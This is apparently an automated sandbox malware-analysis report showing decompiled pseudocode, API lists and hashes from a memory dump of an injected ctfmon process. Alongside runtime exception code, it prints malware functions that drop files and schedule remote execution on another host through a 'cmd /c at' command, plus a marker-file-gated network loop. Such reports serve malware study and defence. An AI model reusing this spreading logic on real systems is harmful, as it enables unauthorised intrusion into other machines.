																		_v16 = 0;
																		_t210 =  *((intOrPtr*)( *((intOrPtr*)(_v4 + 0x1c)) + 0xc));
																		_t211 = _t210 + 4;
																		__eflags = _t211;
																		_v28 =  *_t210;
																		_v36 = _t211;
																		do {
																			_t271 = _t211;
																			_t212 = _v28;
																			_v24 = _t211;
																			_v20 = _t212;
																			__eflags = _t212;
																			if(_t212 > 0) {
																				_t214 =  *((intOrPtr*)(_t305 + 4)) + _t283;
																				__eflags = _t214;
																				_v32 = _t214;
																				while(1) {
																					_t215 = E00972B69(_t214,  *_t271,  *((intOrPtr*)(_v4 + 0x1c)));
																					_t318 = _t318 + 0xc;
																					__eflags = _t215;
																					if(_t215 != 0) {
																						break;
																					}
																					_t217 = _v20 - 1;
																					_t271 = _v24 + 4;
																					_v20 = _t217;
																					__eflags = _t217;
																					_v24 = _v24 + 4;
																					_t214 = _v32;
																					if(_t217 > 0) {
																						continue;
																					} else {
																					}
																					L95:
																					_t283 = _v16;
																					goto L96;
																				}
																				_t257 = 1;
																				goto L95;
																			}
																			L96:
																			_t211 = _v36;
																			_t283 = _t283 + 0x10;
																			_v16 = _t283;
																			_t294 = _t294 - 1;
																			__eflags = _t294;
																		} while (_t294 != 0);
																	}
																	return _t257;
																}
															} else {
																_t198 = E00973879(_t267, _t254, _a24, _a20,  &_v16,  &_v12);
																_t273 = _v16;
																_t319 = _t317 + 0x14;
																_t285 = _v12;
																if(_t273 < _t285) {
																	_t137 =  &(_t198[3]); // 0xc
																	_t310 = _t137;
																	_t198 = _a20;
																	do {
																		if(_t198 >=  *((intOrPtr*)(_t310 - 0xc)) && _t198 <=  *((intOrPtr*)(_t310 - 8))) {
																			_t221 =  *_t310 << 4;
																			if( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) == 0) {
																				L79:
																				_t222 = _t221 + _t310[1] + 0xfffffff0;
																				_t300 = _v0;
																				if(( *(_t221 + _t310[1] + 0xfffffff0) & 0x00000040) == 0) {
																					_push(1);
																					_t155 = _t310 - 0xc; // 0x0
																					E00972157(_t254, _t285, _t300, _a4, _a8, _a12, _t254, _t222, 0, _t155, _a24, _a28);
																					_t285 = _v12;
																					_t319 = _t319 + 0x2c;
																					_t273 = _v16;
																				}
																			} else {
																				_t285 = _v12;
																				_t254 = _a16;
																				if( *((char*)( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) + 8)) == 0) {
																					goto L79;
																				}
																			}
																			_t198 = _a20;
																		}
																		_t273 = _t273 + 1;
																		_t310 =  &(_t310[5]);
																		_v16 = _t273;
																	} while (_t273 < _t285);
																}
																goto L83;
															}
														} else {
															__imp__EncodePointer();
															_t304 = _t199;
															if( *((intOrPtr*)(E0097360E(_t254, _t267, _t282, _t290, _t304, _t341, 0) + 8)) == _t304 ||  *_t290 == 0xe0434f4d ||  *_t290 == 0xe0434352) {
																goto L72;
															} else {
																_t198 = E0097379C(_t290, _a4, _a8, _a12, _t254, _a24, _a28);
																_t317 = _t317 + 0x1c;
																if(_t198 != 0) {
																	L83:
																	goto L84;
																} else {
																	goto L72;
																}
															}
														}
													}
												}
											}
										} else {
											_t336 =  *((intOrPtr*)(_t304 + 0x1c));
											if( *((intOrPtr*)(_t304 + 0x1c)) == 0) {
												goto L62;
											} else {
												goto L19;
											}
										}
									}
								}
							}
						}
					}
				}
			}
















































































                                                0x0097221c
                                                0x0097221c
                                                0x00972223
                                                0x00972226
                                                0x00972228
                                                0x0097222b
                                                0x0097222f
                                                0x0097223a
                                                0x00972242
                                                0x0097223c
                                                0x0097223c
                                                0x0097223c
                                                0x00972245
                                                0x0097224b
                                                0x00972535
                                                0x00972535
                                                0x00000000
                                                0x0097225a
                                                0x0097225a
                                                0x00972263
                                                0x009724fe
                                                0x00000000
                                                0x00972269
                                                0x0097226d
                                                0x00972341
                                                0x00972341
                                                0x00972344
                                                0x00000000
                                                0x00972292
                                                0x00972292
                                                0x00972296
                                                0x00000000
                                                0x0097229c
                                                0x0097229c
                                                0x009722a1
                                                0x009722a5
                                                0x0097252e
                                                0x00972534
                                                0x009722ab
                                                0x009722b0
                                                0x009722b3
                                                0x009722b8
                                                0x009722bf
                                                0x009722c4
                                                0x00000000
                                                0x009722ca
                                                0x009722d0
                                                0x009722fd
                                                0x009722fd
                                                0x00972302
                                                0x00972306
                                                0x00972349
                                                0x00972349
                                                0x0097234c
                                                0x0097234f
                                                0x0097234f
                                                0x00972355
                                                0x00972501
                                                0x00972501
                                                0x00972505
                                                0x00000000
                                                0x00972507
                                                0x00972507
                                                0x0097250b
                                                0x00000000
                                                0x0097250d
                                                0x0097250d
                                                0x00972510
                                                0x00972513
                                                0x00972514
                                                0x00972515
                                                0x00972518
                                                0x00972519
                                                0x0097251a
                                                0x0097251b
                                                0x00972520
                                                0x00000000
                                                0x00972520
                                                0x0097250b
                                                0x0097235b
                                                0x0097235b
                                                0x0097235f
                                                0x00000000
                                                0x00972365
                                                0x00972365
                                                0x0097236c
                                                0x00972384
                                                0x00972384
                                                0x00972388
                                                0x00972392
                                                0x0097239b
                                                0x009723a0
                                                0x009723a3
                                                0x009723a6
                                                0x009723a9
                                                0x009723af
                                                0x009723af
                                                0x009723b2
                                                0x009723b5
                                                0x009723b8
                                                0x009723b8
                                                0x009723bb
                                                0x009723be
                                                0x009723c1
                                                0x009723c4
                                                0x009723ca
                                                0x009723cd
                                                0x009723d5
                                                0x009723d8
                                                0x009723db
                                                0x009723dd
                                                0x009723e0
                                                0x009723e3
                                                0x009723ec
                                                0x009723ef
                                                0x009723f2
                                                0x009723f4
                                                0x009723f4
                                                0x009723f7
                                                0x009723fa
                                                0x009723fd
                                                0x00972400
                                                0x00972403
                                                0x00972406
                                                0x00972409
                                                0x0097240c
                                                0x0097240e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00972410
                                                0x00972410
                                                0x00972419
                                                0x0097241e
                                                0x00972421
                                                0x00972423
                                                0x00000000
                                                0x00000000
                                                0x00972428
                                                0x0097242c
                                                0x0097242d
                                                0x00972430
                                                0x00972433
                                                0x00972435
                                                0x00000000
                                                0x00972437
                                                0x00972437
                                                0x00000000
                                                0x00972437
                                                0x00972476
                                                0x00972476
                                                0x00972479
                                                0x0097247c
                                                0x00000000
                                                0x0097247c
                                                0x0097244d
                                                0x00972456
                                                0x0097246e
                                                0x00972473
                                                0x00000000
                                                0x0097243a
                                                0x0097243a
                                                0x0097243b
                                                0x0097243e
                                                0x00972441
                                                0x00972444
                                                0x00972446
                                                0x00972448
                                                0x00972403
                                                0x00972406
                                                0x00972409
                                                0x0097240c
                                                0x0097240e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097240e
                                                0x00000000
                                                0x00972446
                                                0x00972400
                                                0x009723e3
                                                0x009723cd
                                                0x0097247f
                                                0x0097247f
                                                0x00972480
                                                0x00972483
                                                0x00972486
                                                0x00972489
                                                0x00972489
                                                0x009723b8
                                                0x009723a9
                                                0x00972492
                                                0x00972496
                                                0x00972498
                                                0x0097249b
                                                0x009724a1
                                                0x009724a1
                                                0x009724a2
                                                0x009724a6
                                                0x00972523
                                                0x00972523
                                                0x00972528
                                                0x0097252c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009724a8
                                                0x009724aa
                                                0x009724af
                                                0x009724b4
                                                0x00000000
                                                0x009724b6
                                                0x009724b6
                                                0x009724ba
                                                0x009724c2
                                                0x009724c2
                                                0x009724c6
                                                0x00000000
                                                0x009724c8
                                                0x009724c8
                                                0x009724cc
                                                0x009724d2
                                                0x009724d3
                                                0x009724d5
                                                0x00000000
                                                0x009724d7
                                                0x009724d7
                                                0x009724dc
                                                0x009724e6
                                                0x009724e9
                                                0x009724ee
                                                0x009724f2
                                                0x009724f5
                                                0x009724f6
                                                0x009724f9
                                                0x00000000
                                                0x009724fb
                                                0x009724fb
                                                0x009724fb
                                                0x00000000
                                                0x009724f9
                                                0x009724d5
                                                0x009724bc
                                                0x009724bc
                                                0x009724c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009724c0
                                                0x009724ba
                                                0x009724b4
                                                0x0097236e
                                                0x0097236e
                                                0x00972375
                                                0x00000000
                                                0x00972377
                                                0x00972377
                                                0x0097237e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097237e
                                                0x00972375
                                                0x0097236c
                                                0x0097235f
                                                0x00972308
                                                0x00972310
                                                0x00972313
                                                0x00972318
                                                0x0097231b
                                                0x0097231c
                                                0x00972320
                                                0x00972329
                                                0x00000000
                                                0x0097232b
                                                0x0097232b
                                                0x0097232e
                                                0x00972333
                                                0x00972334
                                                0x00972336
                                                0x00000000
                                                0x00000000
                                                0x0097233c
                                                0x0097253a
                                                0x0097253a
                                                0x0097253c
                                                0x0097253d
                                                0x00972544
                                                0x00972547
                                                0x00972555
                                                0x0097255a
                                                0x0097255a
                                                0x0097255d
                                                0x0097255d
                                                0x00972565
                                                0x00972568
                                                0x00972569
                                                0x0097256e
                                                0x00972571
                                                0x00972574
                                                0x00972579
                                                0x0097257b
                                                0x0097257d
                                                0x0097257e
                                                0x0097257f
                                                0x00972580
                                                0x00972583
                                                0x00972589
                                                0x0097268a
                                                0x0097268e
                                                0x0097258f
                                                0x0097258f
                                                0x00972591
                                                0x00972596
                                                0x00972599
                                                0x0097259d
                                                0x009725e4
                                                0x009725e8
                                                0x0097268f
                                                0x00972694
                                                0x00972695
                                                0x00972696
                                                0x00972698
                                                0x0097269b
                                                0x0097269c
                                                0x0097269d
                                                0x009726a0
                                                0x009726a1
                                                0x009726a3
                                                0x0097272b
                                                0x00972730
                                                0x00972731
                                                0x00972734
                                                0x00972735
                                                0x00972736
                                                0x00972737
                                                0x0097273a
                                                0x0097273c
                                                0x0097273e
                                                0x00972765
                                                0x00972765
                                                0x00972765
                                                0x00972740
                                                0x00972740
                                                0x00972742
                                                0x00972752
                                                0x00972759
                                                0x0097275b
                                                0x00000000
                                                0x00000000
                                                0x0097275d
                                                0x0097275e
                                                0x00972761
                                                0x00972763
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00972763
                                                0x0097276c
                                                0x0097276c
                                                0x00972767
                                                0x0097276b
                                                0x009726a9
                                                0x009726a9
                                                0x009726ab
                                                0x009726ad
                                                0x009726af
                                                0x009726b4
                                                0x009726b6
                                                0x009726bc
                                                0x009726c1
                                                0x009726c1
                                                0x009726c4
                                                0x009726c7
                                                0x009726ca
                                                0x009726ca
                                                0x009726cc
                                                0x009726cf
                                                0x009726d2
                                                0x009726d5
                                                0x009726d7
                                                0x009726dc
                                                0x009726dc
                                                0x009726de
                                                0x009726e1
                                                0x009726ea
                                                0x009726ef
                                                0x009726f2
                                                0x009726f4
                                                0x00000000
                                                0x00000000
                                                0x009726fc
                                                0x009726fd
                                                0x00972700
                                                0x00972703
                                                0x00972705
                                                0x00972708
                                                0x0097270b
                                                0x00000000
                                                0x00000000
                                                0x0097270d
                                                0x00972711
                                                0x00972711
                                                0x00000000
                                                0x00972711
                                                0x0097270f
                                                0x00000000
                                                0x0097270f
                                                0x00972714
                                                0x00972714
                                                0x00972717
                                                0x0097271a
                                                0x0097271d
                                                0x0097271d
                                                0x0097271d
                                                0x009726ca
                                                0x0097272a
                                                0x0097272a
                                                0x009725ee
                                                0x009725fd
                                                0x00972602
                                                0x00972605
                                                0x00972608
                                                0x0097260d
                                                0x0097260f
                                                0x0097260f
                                                0x00972612
                                                0x00972615
                                                0x00972618
                                                0x00972624
                                                0x0097262d
                                                0x00972642
                                                0x00972648
                                                0x0097264a
                                                0x00972650
                                                0x00972652
                                                0x00972657
                                                0x0097266c
                                                0x00972671
                                                0x00972674
                                                0x00972677
                                                0x00972677
                                                0x0097262f
                                                0x00972636
                                                0x0097263d
                                                0x00972640
                                                0x00000000
                                                0x00000000
                                                0x00972640
                                                0x0097267a
                                                0x0097267a
                                                0x0097267d
                                                0x0097267e
                                                0x00972681
                                                0x00972684
                                                0x00972615
                                                0x00000000
                                                0x0097260d
                                                0x0097259f
                                                0x009725a1
                                                0x009725a7
                                                0x009725b1
                                                0x00000000
                                                0x009725c3
                                                0x009725d4
                                                0x009725d9
                                                0x009725de
                                                0x00972688
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009725de
                                                0x009725b1
                                                0x0097259d
                                                0x00972589
                                                0x00972329
                                                0x009722f3
                                                0x009722f3
                                                0x009722f7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009722f7
                                                0x009722d0
                                                0x009722c4
                                                0x009722a5
                                                0x00972296
                                                0x0097226d
                                                0x00972263

                                                APIs
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00972320
                                                • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 0097239B
                                                • ___TypeMatch.LIBVCRUNTIME ref: 00972419
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 0097249B
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 009724CC
                                                • FindHandlerForForeignException.LIBVCRUNTIME ref: 0097251B
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 0097253D
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00972555
                                                • _UnwindNestedFrames.LIBCMT ref: 0097255D
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00972569
                                                • CallUnexpected.LIBVCRUNTIME ref: 00972574
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                • String ID: csm$csm$csm
                                                • API String ID: 410073093-393685449
                                                • Opcode ID: f0b01a2c61fd9217fd897e0e4a66776608c373cadfb862bb3540ebd812cf70b0
                                                • Instruction ID: ef695685d70bcd686a6bd916758fca57f1c6ab9ce57791d482c691bf1f2265ec
                                                • Opcode Fuzzy Hash: f0b01a2c61fd9217fd897e0e4a66776608c373cadfb862bb3540ebd812cf70b0
                                                • Instruction Fuzzy Hash: 3DB1DC72810209EFCF24DFA5C841BAEBBB9BF58314F14C149E85967262C735EA41CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096A760 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 148timeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 79%
                                                			E0096A760(void* __ebx, WCHAR* __ecx, void* __edx, void* __edi, struct _SYSTEMTIME _a16, signed short _a24, signed short _a26, short _a30, short _a32, char _a40, char _a80, short _a608, char _a616, char _a624, short _a1120, char _a1128, char _a1664, short _a3712, char _a3720, signed int _a5740, signed int _a5772) {
				void* __esi;
				signed int _t33;
				signed char _t35;
				void* _t48;
				void* _t54;
				void* _t77;
				WCHAR* _t97;
				void* _t101;
				void* _t103;
				signed int _t104;
				signed int _t105;

				_t105 = _t104 & 0xfffffff8;
				E00983CA0();
				_t33 =  *0x98f008; // 0x35554c2f
				_a5740 = _t33 ^ _t105;
				_push(__ebx);
				_push(__edi);
				_t97 = __ecx;
				_t77 = __edx;
				_t35 = GetFileAttributesW(__ecx);
				if(_t35 == 0xffffffff || (_t35 & 0x00000010) == 0) {
					L7:
					_pop(_t101);
					return E00970A5D(_a5740 ^ _t105, _t101);
				} else {
					E00973440(_t97,  &_a80, 0, 0x208);
					_t105 = _t105 + 0xc;
					E0096A210(_t97,  &_a80);
					if(E0096A3B0(_t77,  &_a80,  &_a80, _t97) == 0) {
						goto L7;
					} else {
						E00973440(_t97,  &_a1120, 0, 0x208);
						wsprintfW( &_a1120, L"%ws\\%ws",  &_a80, L"Microsoft.ini");
						_t48 = E0096A630("CONFIGURATION", 0xd,  &_a1128);
						_t105 = _t105 + 0x20;
						if(_t48 == 0) {
							goto L7;
						} else {
							E00973440(_t97,  &_a608, 0, 0x208);
							wsprintfW( &_a608, L"%ws\\%ws", _t97, 0x996838);
							_t54 = E0096A630( *0x996a44,  *0x996a40,  &_a616);
							_t105 = _t105 + 0x20;
							if(_t54 == 0) {
								goto L7;
							} else {
								asm("xorps xmm0, xmm0");
								_a16.wYear = 0;
								_a26 = 0;
								_a30 = 0;
								asm("movq [esp+0x16], xmm0");
								GetLocalTime( &_a16);
								E00973440(_t97,  &_a32, 0, 0x40);
								wsprintfW( &_a32, L"%02d:%02d", _a24 & 0x0000ffff, (_a26 & 0x0000ffff) + 3);
								E00973440(_t97,  &_a1664, 0, 0x800);
								_t105 = _t105 + 0x28;
								if(E0096A6C0( &_a624,  &_a1664) == 0) {
									goto L7;
								} else {
									E00973440(_t97,  &_a3712, 0, 0x800);
									wsprintfW( &_a3712, L"cmd /c at \\\\%ws %ws \"%ws\"", _t77,  &_a40,  &_a1664);
									E0096A330( &_a3720);
									_pop(_t103);
									return E00970A5D(_a5772 ^ _t105 + 0x20, _t103);
								}
							}
						}
					}
				}
			}














                                                0x0096a763
                                                0x0096a76b
                                                0x0096a770
                                                0x0096a777
                                                0x0096a77e
                                                0x0096a780
                                                0x0096a781
                                                0x0096a783
                                                0x0096a786
                                                0x0096a78f
                                                0x0096a950
                                                0x0096a95a
                                                0x0096a966
                                                0x0096a79d
                                                0x0096a7a9
                                                0x0096a7ae
                                                0x0096a7b7
                                                0x0096a7c7
                                                0x00000000
                                                0x0096a7cd
                                                0x0096a7dc
                                                0x0096a801
                                                0x0096a815
                                                0x0096a81a
                                                0x0096a81f
                                                0x00000000
                                                0x0096a825
                                                0x0096a834
                                                0x0096a84f
                                                0x0096a865
                                                0x0096a86a
                                                0x0096a86f
                                                0x00000000
                                                0x0096a875
                                                0x0096a877
                                                0x0096a87a
                                                0x0096a87f
                                                0x0096a883
                                                0x0096a88d
                                                0x0096a893
                                                0x0096a8a2
                                                0x0096a8c3
                                                0x0096a8d4
                                                0x0096a8d9
                                                0x0096a8f1
                                                0x00000000
                                                0x0096a8f3
                                                0x0096a902
                                                0x0096a925
                                                0x0096a931
                                                0x0096a93c
                                                0x0096a94f
                                                0x0096a94f
                                                0x0096a8f1
                                                0x0096a86f
                                                0x0096a81f
                                                0x0096a7c7

                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,?,00995480,00995480,?,0096AA18), ref: 0096A786
                                                  • Part of subcall function 0096A3B0: wsprintfW.USER32 ref: 0096A3F6
                                                  • Part of subcall function 0096A3B0: wsprintfW.USER32 ref: 0096A421
                                                  • Part of subcall function 0096A3B0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0096A442
                                                  • Part of subcall function 0096A3B0: CloseHandle.KERNEL32(00000000), ref: 0096A454
                                                  • Part of subcall function 0096A3B0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000002,00000080,00000000), ref: 0096A4E7
                                                  • Part of subcall function 0096A3B0: GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0096A50A
                                                  • Part of subcall function 0096A3B0: CloseHandle.KERNEL32(00000000), ref: 0096A515
                                                • wsprintfW.USER32 ref: 0096A801
                                                  • Part of subcall function 0096A630: CreateFileW.KERNEL32(0096A81A,C0000000,00000000,00000000,00000002,00000000,00000000,?,745EC0B0,?,CONFIGURATION,?,0096A81A,?), ref: 0096A655
                                                • wsprintfW.USER32 ref: 0096A84F
                                                  • Part of subcall function 0096A630: WriteFile.KERNEL32(00000000,CONFIGURATION,0000000D,?,00000000,?,745EC0B0,?,CONFIGURATION,?,0096A81A), ref: 0096A67B
                                                  • Part of subcall function 0096A630: CloseHandle.KERNEL32(00000000,?,745EC0B0,?,CONFIGURATION,?,0096A81A), ref: 0096A687
                                                • GetLocalTime.KERNEL32(?), ref: 0096A893
                                                • wsprintfW.USER32 ref: 0096A8C3
                                                • wsprintfW.USER32 ref: 0096A925
                                                  • Part of subcall function 0096A330: CreateProcessW.KERNEL32 ref: 0096A384
                                                  • Part of subcall function 0096A330: WaitForSingleObject.KERNEL32(?,00000000,?,745EC0B0), ref: 0096A393
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Filewsprintf$Create$CloseHandle$Time$AttributesLocalObjectProcessSingleWaitWrite
                                                • String ID: %02d:%02d$%ws\%ws$/LU5/$CONFIGURATION$Microsoft.ini$cmd /c at \\%ws %ws "%ws"
                                                • API String ID: 596974635-2542409952
                                                • Opcode ID: 4bd296249048b5e8ddbb2ca54e7a4aa04e3efc2e655cc8cfa64bab92f442639f
                                                • Instruction ID: bd53b2f4d4f96d7fa8fdb7f55036af494f36950417a340fbf74b6364ed9c1dcf
                                                • Opcode Fuzzy Hash: 4bd296249048b5e8ddbb2ca54e7a4aa04e3efc2e655cc8cfa64bab92f442639f
                                                • Instruction Fuzzy Hash: 3D41B9B25583445BD620EB64DC46FDB73DCAFC4708F04492AF59CE7281EA71A6098BA3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00967980 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 193sleepfileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 70%
                                                			E00967980(void* __ebx, void* __edi, intOrPtr _a4) {
				long _v8;
				char _v16;
				signed int _v20;
				char _v102420;
				intOrPtr _v102424;
				intOrPtr* _v102428;
				intOrPtr* _v102432;
				struct _CRITICAL_SECTION _v102456;
				long _v102460;
				long _v102464;
				void* _v102468;
				char _v102472;
				void* __esi;
				signed int _t41;
				signed int _t42;
				void* _t46;
				void* _t60;
				void* _t69;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t104;
				void* _t111;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr _t115;
				void* _t116;
				intOrPtr* _t117;
				signed int _t118;
				void* _t119;
				void* _t120;
				void* _t122;

				_push(0xffffffff);
				_push(E0098463B);
				_push( *[fs:0x0]);
				E00983CA0();
				_t41 =  *0x98f008; // 0x35554c2f
				_t42 = _t41 ^ _t118;
				_v20 = _t42;
				_push(_t42);
				 *[fs:0x0] =  &_v16;
				_t115 = _a4;
				_v102424 = _t115;
				if(_t115 == 0) {
					L15:
					 *[fs:0x0] = _v16;
					_pop(_t116);
					return E00970A5D(_v20 ^ _t118, _t116);
				}
				_t46 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0, 0);
				_t127 = _t46 - 0xffffffff;
				if(_t46 == 0xffffffff) {
					goto L15;
				}
				CloseHandle(_t46);
				_t89 = E00970A6E(_t115, _t127, 0x214);
				_t120 = _t119 + 4;
				_v102432 = _t89;
				 *_t89 = 0x98cac0;
				E00968E80();
				_t111 = 0;
				_t117 =  *((intOrPtr*)( *_t89 + 0xc))(_t115, 0x921e);
				if(_t117 != 0) {
					L5:
					E00973440(_t111,  &_v102420, 0, 0x19000);
					_v102472 = 0x98cab8;
					_v102460 = 0;
					_v102468 = 0;
					_v102464 = 0;
					InitializeCriticalSection( &_v102456);
					_v8 = 0;
					_t112 = E00970A6E(_t117, _t130, 0x21c);
					_v102428 = _t112;
					 *_t112 = _t117;
					_t17 = _t112 + 4; // 0x4
					 *(_t112 + 0x214) = 0;
					 *((char*)(_t112 + 0x218)) = 0;
					E00973440(_t112, _t17, 0, 0x10c);
					_t20 = _t112 + 0x110; // 0x110
					E00975C70(_t20, 0x104, "C:\\Windows\\system32\\msvcwme.log");
					_t122 = _t120 + 0x28;
					_t60 =  *((intOrPtr*)( *_t117 + 0x24))();
					if(_t60 == 0xffffffff) {
						L12:
						 *((intOrPtr*)( *_t117 + 0x18))();
						E00970AA1(_t112);
						 *((intOrPtr*)( *_t89))(1, 0x21c);
						 *((intOrPtr*)( *_t117))(1);
						_push(1);
						E00970AA1(_v102424);
						_t69 = _v102468;
						_v102472 = 0x98cab8;
						if(_t69 != 0) {
							VirtualFree(_t69, 0, 0x8000);
						}
						DeleteCriticalSection( &_v102456);
						goto L15;
					}
					_t113 = Sleep;
					_t90 = _v102428;
					do {
						if(_t60 <= 0) {
							goto L10;
						}
						E00973440(_t113,  &_v102420, 0, 0x19000);
						_t122 = _t122 + 0xc;
						_push(0x19000);
						_push( &_v102420);
						if( *((intOrPtr*)( *_t117 + 0x14))() <= 0) {
							break;
						}
						E00968BB0(_t90, _t90, _t113,  &_v102472,  &_v102420, _t76);
						L10:
						Sleep(0xa);
						_t60 =  *((intOrPtr*)( *_t117 + 0x24))();
					} while (_t60 != 0xffffffff);
					_t89 = _v102432;
					_t112 = _v102428;
					goto L12;
				} else {
					goto L3;
				}
				while(1) {
					L3:
					_t104 = _t111;
					_t111 = _t111 + 1;
					if(_t104 >= 5) {
						break;
					}
					Sleep(0xbb8);
					_t117 =  *((intOrPtr*)( *_t89 + 0xc))(_v102424, 0x921e);
					_t130 = _t117;
					if(_t117 == 0) {
						continue;
					}
					goto L5;
				}
				E00970AA1(_v102424);
				 *((intOrPtr*)( *_t89))(1, 1);
				__eflags = _t117;
				if(_t117 != 0) {
					 *((intOrPtr*)( *_t117))(1);
				}
				goto L15;
			}


































                                                0x00967983
                                                0x00967985
                                                0x00967990
                                                0x00967996
                                                0x0096799b
                                                0x009679a0
                                                0x009679a2
                                                0x009679a8
                                                0x009679ac
                                                0x009679b2
                                                0x009679b5
                                                0x009679bd
                                                0x00967bd7
                                                0x00967bdc
                                                0x00967be5
                                                0x00967bf4
                                                0x00967bf4
                                                0x009679d7
                                                0x009679dd
                                                0x009679e0
                                                0x00000000
                                                0x00000000
                                                0x009679e7
                                                0x009679f7
                                                0x009679f9
                                                0x009679fc
                                                0x00967a02
                                                0x00967a08
                                                0x00967a17
                                                0x00967a1c
                                                0x00967a20
                                                0x00967a51
                                                0x00967a5f
                                                0x00967a67
                                                0x00967a77
                                                0x00967a81
                                                0x00967a8b
                                                0x00967a96
                                                0x00967aa1
                                                0x00967aad
                                                0x00967ab6
                                                0x00967abc
                                                0x00967abe
                                                0x00967ac1
                                                0x00967acc
                                                0x00967ad3
                                                0x00967add
                                                0x00967ae9
                                                0x00967af0
                                                0x00967af5
                                                0x00967afb
                                                0x00967b73
                                                0x00967b77
                                                0x00967b80
                                                0x00967b8e
                                                0x00967b96
                                                0x00967b98
                                                0x00967ba0
                                                0x00967ba5
                                                0x00967bae
                                                0x00967bba
                                                0x00967bc4
                                                0x00967bc4
                                                0x00967bd1
                                                0x00000000
                                                0x00967bd1
                                                0x00967afd
                                                0x00967b03
                                                0x00967b10
                                                0x00967b12
                                                0x00000000
                                                0x00000000
                                                0x00967b22
                                                0x00967b2f
                                                0x00967b32
                                                0x00967b37
                                                0x00967b3f
                                                0x00000000
                                                0x00000000
                                                0x00967b52
                                                0x00967b57
                                                0x00967b59
                                                0x00967b5f
                                                0x00967b62
                                                0x00967b67
                                                0x00967b6d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00967a22
                                                0x00967a22
                                                0x00967a22
                                                0x00967a24
                                                0x00967a28
                                                0x00000000
                                                0x00000000
                                                0x00967a33
                                                0x00967a4b
                                                0x00967a4d
                                                0x00967a4f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00967a4f
                                                0x00967bff
                                                0x00967c0d
                                                0x00967c0f
                                                0x00967c11
                                                0x00967c19
                                                0x00967c19
                                                0x00000000

                                                APIs
                                                • CreateFileA.KERNEL32(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000,35554C2F,?,?,?,?,0098463B,000000FF), ref: 009679D7
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0098463B,000000FF), ref: 009679E7
                                                • new.LIBCMT ref: 009679F2
                                                  • Part of subcall function 00968E80: WSAStartup.WS2_32(00000202,35554C2F), ref: 00968EA3
                                                • Sleep.KERNEL32(00000BB8), ref: 00967A33
                                                • InitializeCriticalSection.KERNEL32(?), ref: 00967A96
                                                • new.LIBCMT ref: 00967AA8
                                                • Sleep.KERNEL32(0000000A,?,?,?,?,00000000,0000010C,0000021C), ref: 00967B59
                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?,00000000,0000010C,0000021C), ref: 00967BC4
                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,0000010C,0000021C), ref: 00967BD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CriticalSectionSleep$CloseCreateDeleteFileFreeHandleInitializeStartupVirtual
                                                • String ID: /LU5/$C:\Windows\system32\msvcwme.log
                                                • API String ID: 1876426310-1836764948
                                                • Opcode ID: 3216d4870241e0e7bc39f00f051f3af4d971a997a81d0236476d008089d8ba59
                                                • Instruction ID: 5ed5bf7a780ebc63059044a77cdfc0fba497be503c07736e1aeab2db568be0d8
                                                • Opcode Fuzzy Hash: 3216d4870241e0e7bc39f00f051f3af4d971a997a81d0236476d008089d8ba59
                                                • Instruction Fuzzy Hash: 14718571A40614AFDB21DF64CC59FDDB7B8BF48B14F1105A4F609AB3D1C7B09A448B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

